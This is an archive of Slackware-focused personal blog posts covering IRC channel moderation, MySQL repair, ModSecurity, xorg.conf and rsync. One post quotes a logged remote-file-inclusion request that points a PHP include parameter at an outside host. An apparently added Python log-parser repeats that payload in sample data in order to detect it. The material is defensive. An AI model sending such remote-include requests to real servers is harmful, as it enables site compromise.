Saturday, February 17, 2007

Did some ##slackware log archiving...

Yeah, I had to do some archiving of the logs, as disk space usage was at 96%. I didn't just archive the channel logs, but also archived my snort and web logs. About the only thing I haven't archived yet are the modsecurity logs (will do that sometime this weekend). The host's drive space is currently at 74%. The channel logs are still in place, but I've crunched the logs into monthly tar.bz2 files. This renders the logs unsearchable by Google (yeah, this sucks), but I had to compromise...they are still downloadable, just not searchable. So, if you need them, they are there for download. Once you download them, you can grep each tar.bz2 after uncompressing them. Hopefully, Google still has the logs cached so that a person searching for an item can still see the cached files. Maybe I'll purchase more drive space so that I can host the logs in an untarred and uncompressed format in the near future.

Speaking of the channel, there has again been some ruckus about someone being banned 'unduly'. People have to recognize that moderating a channel does come at a price. One of these prices is the fact that people can't visit their frustrations on the channel. An individual visited the channel highly upset that Pat froze Slackware-current relating to issues with both the 2.4 and 2.6 kernel. Instead of following advice to follow up with Pat, he continued to vent on the channel, causing a rather heated flame war over something trivial. He was +q'd (meaning his speech was removed), but he evaded +q. He was then "removed" (meaning he was booted, not kicked, from the channel), but came back in the channel with the same attitude. He was then banned for 30 days. Anyone who evades moderation will automatically get a ban. Why 30 and not 7 days? Because, behind the scenes, in private message, the individual was very argumentative and I didn't feel like dealing with him 2 days later for the same offense. After reading the logs, someone had the gall to mention in the channel that the ban was unwarranted...this person thought that the individual was banned because of his views...WRONG. Read the channel guidelines. It states specifically that any +q/ban evasion will be dealt with in a rather harsh manner. Many people do not realize that the ops will never be able to please every single person's views in the channel. I've been doing this a LONG time (4+ years) and no matter if I just sit there and let the channel run itself or if I step in and boot someone, someone ALWAYS complains. It's a no-brainer for me: moderation is what it is. You can take it or leave it. There aren't too many channels on Freenode that aren't moderated. By nature, moderation pretty much means you can't state everything you feel, especially when it ruins the continuity of the channel chat. Is this an oxymoron, especially since Freenode is inhabited mostly by coders and free-thinkers?
Every discussion, whether it's in real life in a conference or in someone's home or online on a forum or in a chat room/channel, will have some type of moderation. So, going forward, I'll not be including comments to the ban messages, as this adds confusion to why the person was banned. Really, the channel doesn't need to know why said person was banned after the fact. The ban messages are for the person being banned and it was designed that way by the people who set up the IRC specifications. If you want to know why someone was banned, speak with them directly or read the logs. I've no time to hold some lengthy dialog with someone who thinks that everyone should join an IRC channel and unload their frustrations. I try to think as objectively as possible on anything that goes on in the channel and to be quite honest, there's been a ton of bitching about the ops lately. When I see the non-ops quit pushing the ops' buttons, I'll take them more seriously and get more active in seeing to their needs...but the bellyaching has to stop first. Seriously, it's usually the same people bitching about their rights being violated, and if it's not the same people, there's usually some association.

Tuesday, January 16, 2007

I saw someone hammering my web server

I saw someone hammering my web server today and yesterday. He/she generated 196 Snort alerts, which is quite a bit for my server. The cool thing is, there was negative response to the attack for two reasons:

1. The server doesn't use PHP or CGI and the attack was designed to exploit those two software packages.

2. I use ModSecurity, which is a web server application firewall.

See payload below (ModSecurity):

Request: midas.slackware.lan 198.145.244.232 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1" 403 304 "-" "Morfeus Fucking Scanner" RawyokKgjR4AAFL7qwU "-"
----------------------------------------
GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 66.160.141.30
User-Agent: Morfeus Fucking Scanner
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev "2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

The activity triggered a rule I created (yeah, ModSecurity is rule-based). I know I don't use PHP but I'd still like to see such attacks on my network, as a heads-up to escalated attacks. What I don't have is a reactive firewall, one that blocks traffic such as this automatically. I had to add the IP to my block list by hand, which sucks.

ModSecurity also has a web-based console that I haven't figured out how to use yet, so I usually parse the flat logs manually then correlate any malicious traffic with my firewall and Snort logs to get a better picture of questionable activity. Once I figure out how to get the web-based console up and running, I'll let you know and maybe throw together a how-to for how to utilize ModSecurity on Slackware.
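One way to script the flat-log pass described above, as an added example (not the author's tooling and not part of ModSecurity): it parses audit entries in the layout shown in this post, tolerates a message line wrapped across two lines, flags query parameters that carry an absolute URL, and lists denied clients as candidates for review before they go on a block list. The function names, the assumption that every entry starts with "Request: ", and the sample log (documentation-range addresses) are all constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample in the layout of the entry above; addresses are
# documentation ranges (RFC 5737), not real hosts.
SAMPLE_LOG = '''\
Request: www.example.lan 192.0.2.10 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://198.51.100.7/C.php?&/ HTTP/1.1" 403 304 "-" "ExampleScanner" AAAAAAAAAAAAAAAAAAA "-"
----------------------------------------
GET /calendar/index.php?inc_dir=http://198.51.100.7/C.php?&/ HTTP/1.1
Host: 203.0.113.5
User-Agent: ExampleScanner
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev
"2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403

HTTP/1.1 403 Forbidden
Connection: close

Request: www.example.lan 192.0.2.10 - - [15/Jan/2007:21:04:19 -0500] "GET /forum/index.php?path=http%3A%2F%2F198.51.100.7%2FC.php HTTP/1.1" 403 304 "-" "ExampleScanner" BBBBBBBBBBBBBBBBBBB "-"
----------------------------------------
GET /forum/index.php?path=http%3A%2F%2F198.51.100.7%2FC.php HTTP/1.1
Host: 203.0.113.5
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev "2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403

Request: www.example.lan 192.0.2.44 - - [15/Jan/2007:22:10:02 -0500] "GET /index.php?page=about HTTP/1.1" 403 304 "-" "Mozilla/5.0" CCCCCCCCCCCCCCCCCCC "-"
----------------------------------------
GET /index.php?page=about HTTP/1.1
Host: www.example.lan
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev "2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403
'''

# First line of an entry: vhost, client, timestamp, request line, status, UA.
REQUEST_RE = re.compile(
    r'^Request: (?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"'
)
HEADER_RE = re.compile(r'^[A-Za-z][\w-]*: ')
TAG_RE = re.compile(r'\[(id|msg|severity) "([^"]*)"\]')


def has_remote_include(uri):
    """True if any query parameter value (after URL-decoding) is an absolute URL."""
    query = uri.partition("?")[2]
    return any(value.lower().startswith(("http://", "https://", "ftp://"))
               for _, value in parse_qsl(query, keep_blank_values=True))


def parse_entries(text):
    """Split the flat log into entries and pull out client, URI and rule tags."""
    entries, current, in_message = [], None, False
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if match:
            current = match.groupdict()
            current["status"] = int(current["status"])
            current["message"] = ""
            entries.append(current)
            in_message = False
        elif current is None:
            continue  # text before the first entry
        elif line.startswith("mod_security-message: "):
            current["message"] = line.split(": ", 1)[1]
            in_message = True
        elif in_message and line and not HEADER_RE.match(line):
            current["message"] += " " + line  # wrapped continuation of the message
        else:
            in_message = False
    for entry in entries:
        tags = dict(TAG_RE.findall(entry["message"]))
        entry["rule_id"] = tags.get("id")
        entry["msg"] = tags.get("msg")
        entry["remote_include"] = has_remote_include(entry["uri"])
    return entries


def block_candidates(entries, threshold=2):
    """Clients with at least `threshold` denied (403) requests, busiest first."""
    denied = Counter(e["client"] for e in entries if e["status"] == 403)
    hits = [(ip, count) for ip, count in denied.items() if count >= threshold]
    return sorted(hits, key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_LOG)
    for e in parsed:
        print(e["time"], e["client"], e["rule_id"], e["remote_include"], e["uri"])
    print("review before blocking:", block_candidates(parsed))
```

The addresses it reports can then be matched against the firewall and Snort logs for the same time window before anything is added to a block list.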

Thursday, December 28, 2006

MySQL database corruption: fix

When I upgraded my main tower to Slack v11.0, I had also upgraded MySQL to v5.0.24a (I don't know what version I was using before this). Soon after the upgrade, I noticed that I couldn't access my local PHPBB and PHPMyAdmin installs.

I was receiving the following error using the MySQL client:

bash-3.1$ mysql -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)


The MySQL error logs looked like this:

061227 03:08:12 mysqld started
061227 3:08:12 [Warning] No argument was provided to --log-bin, and --log-bin-index was not used; so replication may break when this MySQL server acts as a master and has his hostname changed!! Please use '--log-bin=slackbox-bin' to avoid this problem.
061227 3:08:12 InnoDB: Started; log sequence number 0 4066534
061227 3:08:12 [Warning] Found invalid password for user: 'root @% '; Ignoring user
061227 3:08:12 [Note] /usr/libexec/mysqld: ready for connections.
Version: '5.0.24a-log' socket: '/tmp/mysql.sock' port: 0 Source distribution
061227 13:13:11 [Note] /usr/libexec/mysqld: Normal shutdown


Even after restarting the MySQL service, skipping grant tables, and resetting the password, the above still showed. So, I ran the following (after restarting the MySQL service using the init script):

bash-3.1$ mysql_fix_privilege_tables --verbose
This script updates all the mysql privilege tables to be usable by
MySQL 4.0 and above.

This is needed if you want to use the new GRANT functions,
CREATE AGGREGATE FUNCTION, stored procedures, or
more secure passwords in 4.1

You can safely ignore all 'Duplicate column' and 'Unknown column' errors
because these just mean that your tables are already up to date.
This script is safe to run even if your tables are already up to date!

ERROR 1060 (42S21) at line 22: Duplicate column name 'File_priv'
ERROR 1060 (42S21) at line 28: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 29: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 30: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 41: Duplicate column name 'ssl_type'
ERROR 1146 (42S02) at line 67: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 68: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 70: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 72: Table 'mysql.procs_priv' doesn't exist
ERROR 1054 (42S22) at line 94: Unknown column 'Type' in 'columns_priv'
ERROR 1060 (42S21) at line 100: Duplicate column name 'type'
ERROR 1060 (42S21) at line 110: Duplicate column name 'Show_db_priv'
ERROR 1060 (42S21) at line 127: Duplicate column name 'max_questions'
ERROR 1060 (42S21) at line 137: Duplicate column name 'Create_tmp_table_priv'
ERROR 1060 (42S21) at line 140: Duplicate column name 'Create_tmp_table_priv'
ERROR 1061 (42000) at line 145: Duplicate key name 'Grantor'
ERROR 1054 (42S22) at line 247: Unknown column 'Create_view_priv' in 'where clause'
ERROR 1054 (42S22) at line 277: Unknown column 'Create_routine_priv' in 'where clause'
ERROR 1054 (42S22) at line 313: Unknown column 'Create_user_priv' in 'where clause'
done
bash-3.1$


After that, I was able to access the databases using the root MySQL account:

bash-3.1$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
bash-3.1$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 5.0.24a-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> quit
Bye
bash-3.1$


The issue? Apparently, there were three duplicates of the "Grant_priv" column, which I don't think was the REAL issue. Per the script notes, duplicates don't appear to break anything, but looking at where the script notes state, "This script updates all the mysql privilege tables to be usable by MySQL 4.0 and above," I wonder if that's all I needed to do (because I upgraded to a higher version).

I sometimes become so reliant upon PHPMyAdmin that I don't always know how to fix underlying issues. It looks like I'll be delving into MySQL commandline more often, just to understand MySQL at a base level before utilizing front-end tools, or at least reference PHPMyAdmin's SQL query statements a bit more (which is a very cool feature, as the front-end puts what it's doing into commandline structure).

I'm betting some of you are wondering why I'm using PHPBB on my LAN. I use it as a note-taking tool. Whatever machine I'm on in my LAN, I can reference important notes or create notes that are in a central location. Even if I'm at work or at a coffee shop, I can tunnel into my LAN and view all my notes. The only thing I have to remember is to back up my databases religiously so I don't lose very important data that will hinder my work at home (and somewhat at my workplace). Yeah, I know that there may be better ways to take notes, but my notes sometimes tend to be lengthy and when I'm troubleshooting, it's easy to create a thread of trial-and-error posts so I can keep track of what I need to do, what I've already done, or what I shouldn't do. There aren't too many tools that can organize and store data like a CMS can. :)

Happy Holidays!!

Tuesday, October 24, 2006

Using a PCMCIA Wifi Card On Your Laptop - Closed-source Chipsets

I've got my WPC54GS Linksys wifi card, which uses a closed-source chipset (Broadcom), working with Slackware 10.2 installed on a Dell Inspiron 8500. I've posted the process to get this working before at slackwiki.org.

I've scripted this process. You can grab the script from here. Edit it as you see fit. Many people actually use the tools that come with Slackware (the wireless configs in /etc/rc.d, I believe). I script my own, as I've many different wifi cards that I often swap out for different needs.

Anyways, give it a shot.

My next task is getting WPA working with the card (wpa_supplicant, I believe).

Ever Wonder How to Use A Mouse & Touchpad in X?

I remember, awhile back, I got a USB mouse and touchpad working in X on my first laptop (using Suse). Many people still ask this question in ##slackware.

All you do is ensure you have the following within your xorg.conf file:


Section "ServerLayout"
Identifier "X.org Configured"
Screen 0 "Screen0" 0 0
InputDevice "Mouse0" "CorePointer"
InputDevice "Mouse1" "SendCoreEvents"
InputDevice "Keyboard0" "CoreKeyboard"

.
.
.

Section "InputDevice"
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/mouse"
EndSection

Section "InputDevice"
Driver "mouse"
Identifier "Mouse1"
Option "Device" "/dev/input/mice"
Option "Name" "Autodetection"
Option "Protocol" "imps/2"
Option "Vendor" "Logitech"
EndSection


You'll notice that the bold print is the print that you have to add to your pre-existing configuration.

The whole file is here.

Give it a whirl...and good luck!

Sunday, October 22, 2006

Recently Acquired a Dell Precision 220, Installed ZenWalk 3.0 on it

Yes, I got a Dell Precision 220 from work that they were going to throw in the trash (along with a Dell 17" CRT monitor). It lacked RAM and a hard disk. I scrounged up some RAM and this was a difficult task, as the system requires RAMBUS. I found 128MB between two chips of RAMBUS, which isn't a lot but it gets the system working. The system also supports SMP but only has one processor at the moment, a PIII Coppermine 650MHz CPU. It is peppy enough with ZenWalk.

Why ZenWalk? Because I've Slackware running on three systems already and wanted to try ZenWalk, which is a derivative of Slackware. It does well.

The system currently has three NICs, which is why I will eventually place it on firewall duty.

I'm trying to score two 1GHz CPUs (the max this system will take), although they'll have to be PIII Coppermines and also be matched. I found one such matching set locally on Craigslist, but have yet to coordinate a meet/buy. I may even put them into my Dell Precision 410 instead, and swap out the 410's 450MHz CPUs to the Precision 220.

I'll keep you informed on how ZenWalk is, as the days go by.

Friday, October 20, 2006

Xine and adding .wmv support; ModSecurity using Slackware 9.0 and Apache 1.3.37

I don't know why I hadn't done this before, but last night, I finally added .wmv support to Xine, following the directions at http://xinehq.de/index.php/faq#WMV. I had it functional using .wmv support within 5 minutes.

Please don't email me about how you got it working with mplayer. I don't do mplayer and any mplayer comments won't add value to my Xine experience. :)

I've also given ModSecurity a spin (see http://www.modsecurity.org/). It's VERY nice. I'm using it on my public Apache server (version 1.3.37), which runs Slackware 9.0...yes, I need to update, but it's as production as I can get it and it is hardened, so I'm not so worried about it being quite a bit behind the versioning scheme. As long as it works.

What is ModSecurity? From the website, "ModSecurity is an embeddable web application firewall. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure." You can also get a core ruleset from the same site. I've been trying to create my own rules with nil results, so I think I'll give the core rules a shot.

Try ModSecurity. I'm sure you'll like the logging, at the very least.

Tuesday, October 03, 2006

Slackware v11 out!!

From the Slackware-current changelog:

Sun Oct 1 23:50:53 CDT 2006
Slackware 11.0 is released. Thanks to everyone who helped out and made this
release possible. If I forgot you in the ChangeLog, mea culpa, but you know
who you are, and thanks. :-)
Enjoy! -P.

Sunday, October 01, 2006

Slack Machine Woes Fixed!

My Slack tower is fixed.

The root cause was that, somehow, when I created a new partition from some free space on the drive, the Slack install didn't like it one bit and complained the whole time. I'm not going to blame Gparted, though...

On this system, I use / to house the whole Slackware install, using /home as a directory instead of having it as its own partition. /home was 9+ GB and growing, so that / was at 92% in utilization. I decided to move it to its own partition. Using Gparted, I created a partition (/dev/hdb5). There were currently two primary partitions already on the drive (/ and swap), so I decided to create a logical partition to house /home. Somehow, Gparted fux0red the extended partition, I think.

Soon after I created the partition, I began to see boot errors hinting that there was a corruption problem with this drive, although if I sat through the boot errors, they'd finally stop and I'd get a login prompt.

I misdiagnosed the issue and thought that this 7-year-old drive had finally given up the ghost. I almost trashed the drive but decided to give it another shot by removing the extended partition and making a new partition, a primary one. In fact, I made two and moved /home to one of them (/dev/hdb2, I believe). Afterward, I adjusted my /etc/fstab to see /home and rebooted. There were no more errors on boot.

Next, I need to start doing nightly/weekly backups (somehow), then maybe clear out my /home and get rid of some junk (maybe backup to DVD).

Tuesday, September 26, 2006

Slackware-current is at RC5, as of 21 September

Yes, this is the longest string of RC status ever. Pat promises that this will be the last version before release. There's still a good bit of changelog activity, though.

Also, I've lost my Slackware tower. Well, it's still here, but one of the drives went corrupt. I saw a ton of corruption in my Slack install's dmesg that didn't clear after doing an fsck. If anything it got a LOT worse. Luckily, I'd just done a backup of my /home dir to another drive, LIKE 5 MIN BEFORE THE DRIVE STARTED THROWING ERRORS! Talk about lucky. Now, I have an issue. This tower doesn't have a floppy drive (although I can hook one up). I need a floppy so I can boot up using a WinXP or MSDOS floppy that contains the format command...you see, I have to clear lilo from the boot drive's MBR before I can be able to use the system again, as the system currently tries to boot me into the bad drive (which I've removed...I'll double-check later whether it's salvageable or not).

I guess this means I'm in the market for a new hard disk. This is the perfect opportunity for me to get another SATA drive, preferably higher capacity than my 160GB drive. The drive that went corrupt was a Maxtor 60GB drive that I bought around 1999-2000...talk about long lived. What brand will I get next? Most likely a Seagate or Maxtor. I may get another 160GB Seagate so that I can give RAID a go (I've an onboard SATA RAID controller).

For now, I've no working Slackware machine...OK, shoot me cuz I just lied. I've my Dell Inspiron 8500 and my Toshiba Satellite 1GHz. Both need to be rsync'd, which means I have to use CAT5 to do the sync...last time I did an rsync over wifi, it wasn't pretty.

Anyways, I've my work cut out for me for the next two weeks. AND, I've to study so I can take the CCSA and CCSE exams.

Thursday, September 07, 2006

Slackware now at RC4 status, as of 3 Sep 2006

Yes, Slack is at RC4 now, and has been a bit dormant since the 3rd of September, with quite a few updates. The quietness may be a good indication that things are almost ready to go stable. We shall see.

I've yet to update to RC4, but maybe I'll get the chance this weekend.

Wednesday, August 30, 2006

Slackbox is now at RC3

I updated my machine to Slackware v11.0 RC3 last night. It didn't take long and I also moved my local mirror. I haven't noticed much of any difference in RC1 or RC2, function-wise. Nothing appears broken, although since I'm using 2.6.17.8, I've noticed a lot of 'atkbd' errors in my /var/log/messages file, which I attribute to my KVM not agreeing with that kernel. We shall see...

Sunday, August 27, 2006

Slackware Wikipedia Entry, ##slackware road rage that has to stop

Here it is: http://en.wikipedia.org/wiki/Slackware

The above link is for people who constantly enter ##slackware asking what Slackware is about or how it compares to other distributions.

The questions are highly irritating, as the information is ALL over the internet and people tend to not use http://www.google.com as it was intended. There are comparisons between Slackware and other distributions everywhere. Information on Slackware and its philosophy is also everywhere, so it is a bit ridiculous going to ##slackware and asking for comments, especially when one will most likely receive biased opinions: of course we aren't going to slight our own distribution.

##slackware on the whole has become very weird lately. We've lost a few old-timers that offered excellent support. We've also decided to kill the more off-topic banter unless there is absolutely nothing else to chat about...then we tend to get visitors who think we serve them like it is a paying job and we're customer support. We also have regulars who try to dictate to the channel operators the way the channel should be run...they pretty much threaten to hijack the userbase by opening other channels if they don't get their way or say in the matter.

I should explain how things should work:

1. I'm the head operator of ##slackware on irc.slackware.com. I maintain the channel's chat flow. I don't lord it over the channel. Proof that I do not abuse operator power is documented in your own IRC client logs (if you've visited ##slackware) or at http://wigglit.ath.cx/slackware_botlogs/.

2. The guidelines are enforced by the operators based on the guidelines posted at http://wigglit.ath.cx/slackware-rules/rules.shtml. Those rules SUPERSEDE the server guidelines (http://freenode.net/channel_guidelines.shtml). What's good for the server isn't necessarily good for our channel. Don't complain to the server ops about this because they will not become involved, as is their policy...they don't govern the channels, that's what the channel ops are for.

3. The channel guidelines are just that: guidelines. They are there to give the visitors an inkling of what's accepted and what's not. These are not constitutional laws, so when you find yourself banned because you think we won't take away your speech and we do, realize that IRC doesn't give you the right to tell someone to fuck off or post porn links or 'fight the man', with 'the man' being the channel operators.

4. Visitors should NOT expect us to answer every question that is asked. Some of us have day jobs. Some have families. Some may not have the experience or knowledge to answer the question. Some don't care. Don't expect the conversation to gravitate toward you when you ask a question. Current discussions may not stop when you ask your question, so don't get ticked off...keep asking (within limits; don't spam the channel with the same question every 60 seconds or you will get removed), maybe every 3 or so minutes. Also, BE SURE YOUR QUESTION PERTAINS TO SLACKWARE, AND NOT SOFTWARE THAT MAY BE INCLUDED IN SLACKWARE'S BASE INSTALL!! This means that if you've an issue with KDE or a KDE application that's installed on your Slackware distribution, your issue isn't slackware-related, it's KDE-related, unless you can PROVE that the underlying issue is indeed related to Slackware. This also applies to hardware.

5. If anything happens in the channel that upsets you, take a deep breath and use your IRC client's ignore function to filter out the unwanted chatter. Don't take the matter into your own hands by insulting the offender, as you may become kicked or banned from the channel, regardless of your intentions. We recently had an incident where someone decided to attack someone based on the perception that the victim was overweight. The offender was asked to stop with a 'first and last warning' but continued 10 minutes later and was banned. Also, at this point, the victim had previously been passive to the attack, but became aggressive when the attacker ignored the operator's warning. After the attacker was banned, an onlooker decided to join the fray by insisting that the victim should also be banned because the victim defended himself by attacking also. The fact remains that the first attacker was banned because he directly ignored an operator's warning. The onlooker was also banned because he couldn't let this issue, which was none of his business, die. Is all of this considered favoritism? In the above context, no, but if you're someone who is used to inciting anarchy, the rules/guidelines of ##slackware will never be enough. This is why every operator is empowered to handle things as they see fit, even when an abuser's tactics skirt the guidelines.

6. Lastly, if you bait an operator just for the sake of skirting guidelines, you're going to lose that battle. An intellectual debate is one thing, a targeted yet subtle attack is beyond the norm and will be dealt with.

I'll probably be posting the link to this entry to ##slackware so people can be aware of how asinine the drama in ##slackware has been lately.

A good example of some of the above activity can be found at this link:

http://wigglit.ath.cx/slackware_botlogs/slackware.log.27Aug2006

Use your browser's find function to find 'corto' and read from there until he gets his voice taken (around 4:22PM).

Slack-current now at RC3 status -- v11.0 release imminent !!

August 25th proved to be quite an active day for the -current changelog.

So, today, I've rsynced a mirror to my local mirror. FYI, I use the following when I rsync:

rsync --delete --progress --delete-excluded --exclude source/ --exclude zipslack/ -lpvrtz slackware.mirrors.tds.net::slackware/slackware-current /mnt/backup/ftp/pub/mirrors/slackware/

When I rsynced, I did it at 1:51PM and it finished at 1:57PM:

sent 381697 bytes received 545507254 bytes 1489465.08 bytes/sec
total size is 1890230078 speedup is 3.46

That's a pretty fast update in 6 minutes! Gotta love FiOS!

Anyways, when it is quiet today, I'll rsync my tower to RC3 then maybe do the same for my Toshiba (which is running v10.1, I think).

Friday, August 25, 2006

Slackware-current @ RC2 status ... Slack v11.0 should appear any day now!!

As you can see in the Slackware-current changelog, -current is at RC2 and has been for a few days.

I'm currently at RC1 on my main workstation...AND using the 2.6 kernel! As that machine uses SATA, I had a bit of a time getting my SATA drive to be seen. The box would boot (the main drive uses EIDE) but I couldn't reach out to my other drives installed in that machine. Well, all it took was to activate the proper module (I'll reference the driver later) to get SATA enabled again.

I've had no issues with RC1, but I'd like to upgrade my Toshiba to RC1 sometime this weekend, to see if there are any wireless issues. My Dell needs to be upgraded to RC1 also, but I hardly use the Linux partition on that laptop.

Other than that, Slackware is chugging along fine on my machines (and my public website at http://wigglit.ath.cx).

Monday, August 07, 2006

UPDATE - http://www.unixfool.com/slack9isolist.shtml

I've semi-updated the mirrors list. This list documents which Slackware mirrors contain ISOs for download. The title of the page is misleading, as it was created when v9.0 was considered fresh. I've checked the links and every link that is working contains v10.2.

I'll go through http://www.slackware.com/getslack to see which mirrors were added since my previous update, then I'll update my pages to reflect the new mirrors.

[EDIT -

I've stopped editing http://www.unixfool.com/slack9isolist.shtml, as it appears that almost every mirror now contains .iso files for the latest versions of Slackware. When this page was initially constructed, many users complained that they couldn't find .iso files on the mirrors, which wasn't the case. I immediately went through all the mirrors published on http://www.slackware.com/getslack and found approximately 10 that offered .iso files.

I may remove that page, as it is currently useless.]

On a side note, I've recently had Verizon's FiOS installed in my home. All I can say is, IT FLIES! And, I can't get enough of the router itself, an Actiontec MI424WR wireless router that appears to be much much more than a SOHO router, as it has TONS of options and configurability. I'm going to be enjoying this router and hope to keep it once my 1-year contract has ended. The only thing my previous router (Linksys WRT54GX4) has that is better is better wireless range, and that's because it's a MIMO (three antennas) router.

I'll keep you guys posted on the FiOS front.

Also, it appears that Slackware has been releasing a ton of bugfixes. Let me restate: it isn't a Slackware-related issue; the updates are related to software (MySQL, Apache...). There has also been a lot of activity in regards to regular -current updates. I'm hoping this means v11.0 is almost ready. I've been rsync'ing like crazy lately, trying to keep current on -current (LOL).

OK, it's late here. G'night!

Wednesday, July 19, 2006

Patiently awaiting Slackware v11.0, Recent Snort Logs...

Yeah, I'm awaiting the release of Slackware v11.0. I should try to rsync my -current machines, which are on v10.1, I believe. That way I'll only have a short sync when v11.0 is released.

I also am scrubbing my logs on wigglit.ath.cx since I've been vacationing and had to attend a funeral in the last two weeks. I saw the below:

[**] [1:485:4] ICMP Destination Unreachable Communication Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
07/19-11:06:44.523876 0:B0:4A:6C:76:53 -> FE:FD:40:3E:E7:DC type:0x800 len:0x46
64.65.236.206 -> 66.160.141.30 ICMP TTL:246 TOS:0x0 ID:28020 IpLen:20 DgmLen:56
Type:3 Code:13 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED,
PACKET FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:43212 -> 64.65.236.206:113 TCP TTL:53 TOS:0x0 ID:15954 IpLen:20 DgmLen:56 DF
Seq: 0xB4CEF72C Ack: 0x10001
** END OF DUMP

I believe I've seen this before in my logs but I want to further investigate it to get a better understanding of what it means.

I've been neglecting my Slackware installs the last month, as I've recently purchased a white Mac Book (2.0 GHz). I'm currently trying to get used to the internal file structure and commands, as they sometimes differ from FreeBSD's typical commands. I've also started a blog documenting my Mac experiences ... see it at http://whitemacbook.blogger.com .

Wednesday, June 28, 2006

Been Busy...again

Hi,

Yeah, I've been busy. Work-related stuff, really, although Summer is upon us and I also have to deal with the kids and relatives visiting (and visiting relatives). I haven't had much time to slack around with Slackware, although I did purchase a Mac Book 7 days ago.

I'll be attempting to build a dedicated box that firewalls and routes traffic. For some reason, I get a lot of latency with my current setup. I've a Netgear FVS114 FW/VPN SOHO set-top box as my router/switch and a Linksys WRT54GX4 that I use as a WAP. The Linksys is on its own subnet since I wanted to experiment with securing my WAP in the best manner. I love the Netgear's capabilities (it appears more capable than the Linksys in doing what I want to do...I've already run into issues where I think I was asking the Linksys to do things it wasn't designed to do). I plan to configure a VPN tunnel between the Netgear and a friend's gateway, to build my VPN skills. What I don't like is the fact that the Netgear appears to lag under load:

ron@delly$ ping 10.150.1.1
PING 10.150.1.1 (10.150.1.1): 56 data bytes
64 bytes from 10.150.1.1: icmp_seq=0 ttl=64 time=1.790 ms
64 bytes from 10.150.1.1: icmp_seq=1 ttl=64 time=1.147 ms
64 bytes from 10.150.1.1: icmp_seq=2 ttl=64 time=1.138 ms
64 bytes from 10.150.1.1: icmp_seq=3 ttl=64 time=1.501 ms
64 bytes from 10.150.1.1: icmp_seq=4 ttl=64 time=1.136 ms
64 bytes from 10.150.1.1: icmp_seq=5 ttl=64 time=1.144 ms
64 bytes from 10.150.1.1: icmp_seq=6 ttl=64 time=1.185 ms
64 bytes from 10.150.1.1: icmp_seq=7 ttl=64 time=1.153 ms

I'm not seeing any packets being dropped, but look at the times! I don't remember them being like that before, although my niece (or rather my wife's niece) does do some heavy downloading, I think.

Anyways, here's the WAP's ping results:

ronald-sinclairs-computer:~ rsinclair$ ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=2.571 ms
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.246 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.392 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.253 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=1.728 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=1.924 ms
64 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=1.680 ms
64 bytes from 192.168.1.1: icmp_seq=7 ttl=64 time=2.368 ms
64 bytes from 192.168.1.1: icmp_seq=8 ttl=64 time=2.792 ms

NASTY! Again, there is no apparent packet loss, but look at the times.

At work, when I'm shelled into home, I can barely work, as I have to wait for keystrokes to register and will also occasionally lose my SSH connection. I will check my Snort output and logs to make sure I'm not being hammered by someone.

Monday, June 05, 2006

Trident Video Drivers?

I'm currently using one of my two laptops (Toshiba Satellite 1805-S274), trying to get X.org drivers working with this laptop. I think I've the driver working with X.org:

bash-3.00$ sudo cat /var/log/Xorg.0.log | grep trident
(II) LoadModule: "trident"
(II) Loading /usr/X11R6/lib/modules/drivers/trident_drv.o
(II) Module trident: vendor="X.Org Foundation"
bash-3.00$

So, it appears that the driver is loaded, yet:

bash-3.00$ glxgears
324 frames in 7.0 seconds = 46.286 FPS
